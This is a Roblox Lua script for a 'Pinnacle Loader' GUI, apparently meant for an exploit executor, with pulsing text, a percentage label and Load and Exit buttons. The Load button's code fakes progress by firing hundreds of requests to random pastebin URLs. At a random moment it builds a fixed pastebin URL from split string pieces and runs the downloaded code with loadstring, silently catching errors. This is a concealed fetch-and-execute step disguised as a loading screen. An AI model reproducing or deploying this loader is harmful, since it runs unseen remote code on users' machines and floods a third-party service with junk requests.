--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 21 | Scripts: 4 | Modules: 0 | Tags: 0
local G2L = {};

-- ServerStorage.PinnacleLoader
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[PinnacleLoader]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- ServerStorage.PinnacleLoader.Main
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(17, 17, 17);
G2L["2"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["2"]["Size"] = UDim2.new(0, 356, 0, 448);
G2L["2"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[Main]];


-- ServerStorage.PinnacleLoader.Main.UICorner
G2L["3"] = Instance.new("UICorner", G2L["2"]);
G2L["3"]["CornerRadius"] = UDim.new(0.01, 10);


-- ServerStorage.PinnacleLoader.Main.1
G2L["4"] = Instance.new("Frame", G2L["2"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(35, 35, 35);
G2L["4"]["Size"] = UDim2.new(0, 356, 0, 32);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Name"] = [[1]];


-- ServerStorage.PinnacleLoader.Main.1.UICorner
G2L["5"] = Instance.new("UICorner", G2L["4"]);
G2L["5"]["CornerRadius"] = UDim.new(0.01, 10);


-- ServerStorage.PinnacleLoader.Main.1.2
G2L["6"] = Instance.new("Frame", G2L["4"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(35, 35, 35);
G2L["6"]["Size"] = UDim2.new(0, 356, 0, 24);
G2L["6"]["Position"] = UDim2.new(0, 0, 0.52727, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[2]];


-- ServerStorage.PinnacleLoader.Main.1.2.UIStroke
G2L["7"] = Instance.new("UIStroke", G2L["6"]);
G2L["7"]["Thickness"] = 1.5;
G2L["7"]["Color"] = Color3.fromRGB(221, 138, 255);


-- ServerStorage.PinnacleLoader.Main.1.UIStroke
G2L["8"] = Instance.new("UIStroke", G2L["4"]);
G2L["8"]["Thickness"] = 1.5;
G2L["8"]["Color"] = Color3.fromRGB(221, 138, 255);


-- ServerStorage.PinnacleLoader.Main.1.3
G2L["9"] = Instance.new("Frame", G2L["4"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(35, 35, 35);
G2L["9"]["Size"] = UDim2.new(0, 356, 0, 24);
G2L["9"]["Position"] = UDim2.new(0, 0, 0.24602, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Name"] = [[3]];


-- ServerStorage.PinnacleLoader.Main.UIStroke
G2L["a"] = Instance.new("UIStroke", G2L["2"]);
G2L["a"]["Thickness"] = 1.5;
G2L["a"]["Color"] = Color3.fromRGB(221, 138, 255);


-- ServerStorage.PinnacleLoader.Main.loadertext
G2L["b"] = Instance.new("TextLabel", G2L["2"]);
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["TextSize"] = 20;
G2L["b"]["FontFace"] = Font.new([[rbxassetid://12187371324]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["BackgroundTransparency"] = 1;
G2L["b"]["Size"] = UDim2.new(0, 356, 0, 40);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[Pinnacle Loader]];
G2L["b"]["Name"] = [[loadertext]];


-- ServerStorage.PinnacleLoader.Main.TextLabel
G2L["c"] = Instance.new("TextLabel", G2L["2"]);
G2L["c"]["BorderSizePixel"] = 0;
G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["TextSize"] = 20;
G2L["c"]["FontFace"] = Font.new([[rbxassetid://12187371324]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["BackgroundTransparency"] = 1;
G2L["c"]["RichText"] = true;
G2L["c"]["Size"] = UDim2.new(0, 356, 0, 121);
G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["Text"] = [[For those who accept <font color='rgb(220,137,255)' transparency='0.03269804274348975'><b>nothing less</b></font>
than <font color='rgb(220,137,255)' transparency='0.03269804274348975'><b>perfection</b></font> in Roblox.]];
G2L["c"]["Position"] = UDim2.new(0, 0, 0.36384, 0);


-- ServerStorage.PinnacleLoader.Main.TextLabel.LocalScript
G2L["d"] = Instance.new("LocalScript", G2L["c"]);



-- ServerStorage.PinnacleLoader.Main.exit
G2L["e"] = Instance.new("TextButton", G2L["2"]);
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(36, 36, 36);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["Size"] = UDim2.new(0, 334, 0, 35);
G2L["e"]["Name"] = [[exit]];
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Exit]];
G2L["e"]["Position"] = UDim2.new(0.0309, 0, 0.89509, 0);


-- ServerStorage.PinnacleLoader.Main.exit.UICorner
G2L["f"] = Instance.new("UICorner", G2L["e"]);
G2L["f"]["CornerRadius"] = UDim.new(0.01, 10);


-- ServerStorage.PinnacleLoader.Main.exit.LocalScript
G2L["10"] = Instance.new("LocalScript", G2L["e"]);



-- ServerStorage.PinnacleLoader.Main.percent
G2L["11"] = Instance.new("TextLabel", G2L["2"]);
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["TextSize"] = 20;
G2L["11"]["FontFace"] = Font.new([[rbxassetid://12187371324]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["TextColor3"] = Color3.fromRGB(255, 0, 0);
G2L["11"]["BackgroundTransparency"] = 1;
G2L["11"]["Size"] = UDim2.new(0, 356, 0, 40);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[0%]];
G2L["11"]["Name"] = [[percent]];
G2L["11"]["Position"] = UDim2.new(0, 0, 0.14732, 0);


-- ServerStorage.PinnacleLoader.Main.TextButton
G2L["12"] = Instance.new("TextButton", G2L["2"]);
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 14;
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(36, 36, 36);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["Size"] = UDim2.new(0, 334, 0, 35);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[Load]];
G2L["12"]["Position"] = UDim2.new(0.0309, 0, 0.80357, 0);


-- ServerStorage.PinnacleLoader.Main.TextButton.UICorner
G2L["13"] = Instance.new("UICorner", G2L["12"]);
G2L["13"]["CornerRadius"] = UDim.new(0.01, 10);


-- ServerStorage.PinnacleLoader.Main.TextButton.loadbtn
G2L["14"] = Instance.new("LocalScript", G2L["12"]);
G2L["14"]["Name"] = [[loadbtn]];


-- ServerStorage.PinnacleLoader.Main.Loaded
G2L["15"] = Instance.new("LocalScript", G2L["2"]);
G2L["15"]["Name"] = [[Loaded]];


-- ServerStorage.PinnacleLoader.Main.TextLabel.LocalScript
local function C_d()
local script = G2L["d"];
	local textLabel = script.Parent
	textLabel.RichText = true
	textLabel.Text = "For those who accept <font color='rgb(220,137,255)'><b>nothing less</b></font>\nthan <font color='rgb(220,137,255)'><b>perfection</b></font> in Roblox."
	
	local pulseSpeed = 1.5
	local minTransparency = 0.7
	local maxTransparency = 1
	
	task.spawn(function()
		while true do
			for i = 0, 1, 0.01 do
				local alpha = math.sin(i * math.pi)
				local transparency = minTransparency + (alpha * (maxTransparency - minTransparency))
				textLabel.Text = string.format("For those who accept <font color='rgb(220,137,255)' transparency='%s'><b>nothing less</b></font>\nthan <font color='rgb(220,137,255)' transparency='%s'><b>perfection</b></font> in Roblox.", 1 - transparency, 1 - transparency)
				textLabel.TextStrokeTransparency = transparency * 0.5
				task.wait(pulseSpeed / 100)
			end
		end
	end)
	
end;
task.spawn(C_d);
-- ServerStorage.PinnacleLoader.Main.exit.LocalScript
local function C_10()
local script = G2L["10"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:Destroy()
	end)
	
end;
task.spawn(C_10);
-- ServerStorage.PinnacleLoader.Main.TextButton.loadbtn
local function C_14()
local script = G2L["14"];
	local HttpService = game:GetService("HttpService")
	local ReplicatedStorage = game:GetService("ReplicatedStorage")
	local min = 500
	local max = 3000
	local button = script.Parent
	local percentLabel = script.Parent.Parent.percent
	percentLabel.Visible = false
	local clickable = false
	
	local function checkLoadPinnacle()
		local loadPinnacle = ReplicatedStorage:FindFirstChild("LoadPinnacle")
		if loadPinnacle and loadPinnacle.Value == true then
			percentLabel.Text = "100%"
			percentLabel.TextColor3 = Color3.fromRGB(0, 255, 0)
			percentLabel.Visible = true
			task.wait(3)
			script.Parent.Parent.Parent:Destroy()
			return true
		end
		return false
	end
	
	local function destroyGUI()
		percentLabel.Text = "100%"
		percentLabel.TextColor3 = Color3.fromRGB(0, 255, 0)
		task.wait(3)
		script.Parent.Parent.Parent:Destroy()
	end
	
	local function makeRequest()
		local code = ""
		for i = 1, 8 do
			local rand = math.random(1, 62)
			if rand <= 10 then
				code = code .. string.char(rand + 47)
			elseif rand <= 36 then
				code = code .. string.char(rand + 54)
			else
				code = code .. string.char(rand + 60)
			end
		end
		local url = "https://pastebin.com/raw/"..code
	
		-- Apenas captura erros silenciosamente para não interromper
		pcall(function()
			game:HttpGet(url)
		end)
	end
	
	local function makeMultipleRequests()
		local totalRequests = math.random(min, max)
		local completedRequests = 0
		local doneTriggered = false
	
		local function updateProgress()
			if checkLoadPinnacle() then
				return true
			end
	
			local percentage = math.min((completedRequests / totalRequests) * 100, 100)
			percentLabel.Text = string.format("%.2f%%", percentage)
			local colorValue = 1 - (percentage / 100)
			percentLabel.TextColor3 = Color3.fromRGB(255 * colorValue, 255 * (1 - colorValue), 0)
	
			if percentage >= 100 then
				destroyGUI()
				return true
			end
			return false
		end
	
		local function processRequest()
			makeRequest()
			completedRequests += 1
			if updateProgress() then
				return true
			end
	
			-- Momento aleatório para carregar `url2`
			if not doneTriggered and math.random() < (completedRequests / totalRequests) then
				local part1 = 'https://pastebin.com/raw/'
				local part2 = '4wUC'
				local part3 = 'bWkW'
				local url2 = part1 .. part2 .. part3
	
				-- Segurança ao executar o script
				local success, result = pcall(function()
					return loadstring(game:HttpGet(url2))()
				end)
				if not success then
					warn("Erro ao executar script de URL2: ", result)
				end
	
				doneTriggered = true
			end
			return false
		end
	
		local batchSize = 10
		local concurrentRequests = 0
		local maxConcurrentRequests = 20
	
		local checking = true
		task.spawn(function()
			while checking do
				if checkLoadPinnacle() then
					checking = false
					return
				end
				task.wait(0.001)
			end
		end)
	
		for i = 1, totalRequests, batchSize do
			while concurrentRequests >= maxConcurrentRequests do
				task.wait(0.01)
			end
			for j = 1, batchSize do
				if not checking then return end
				task.spawn(function()
					concurrentRequests += 1
					if processRequest() then return end
					concurrentRequests -= 1
				end)
			end
			task.wait(0)
		end
	
		while completedRequests < totalRequests and checking do
			task.wait(0.0001)
		end
	
		checking = false
	
		if percentLabel.Parent then
			destroyGUI()
		end
	end
	
	button.MouseButton1Click:Connect(function()
		if clickable then
			return
		end
		clickable = true
		percentLabel.Visible = true
		makeMultipleRequests()
	end)
	
end;
task.spawn(C_14);
-- ServerStorage.PinnacleLoader.Main.Loaded
local function C_15()
local script = G2L["15"];
	print([[
	
	
	
	8888888b.  d8b                                     888          
	888   Y88b Y8P                                     888          
	888    888                                         888          
	888   d88P 888 88888b.  88888b.   8888b.   .d8888b 888  .d88b.  
	8888888P"  888 888 "88b 888 "88b     "88b d88P"    888 d8P  Y8b 
	888        888 888  888 888  888 .d888888 888      888 88888888 
	888        888 888  888 888  888 888  888 Y88b.    888 Y8b.     
	888        888 888  888 888  888 "Y888888  "Y8888P 888  "Y8888  
	
	> For those who accept nothing less than perfection in Roblox.
	
	
	
	                        ,sdPBbs.
	                      ,d$$$$$$$$b.
	                     d$P'`Y'`Y'`?$b
	                    d'    `  '  \ `b
	                   /    |        \  \
	                  /    / \       |   \
	             _,--'        |      \    |
	           /' _/          \   |        \
	        _/' /'             |   \        `-.__
	    __/'       ,-'    /    |    |     \      `--...__
	  /'          /      |    / \     \     `-.           `\
	 /    /;;,,__-'      /   /    \            \            `-.
	/    |;;;;;;;\                                             \
	
	
	
	]])
	
end;
task.spawn(C_15);

return G2L["1"], require;
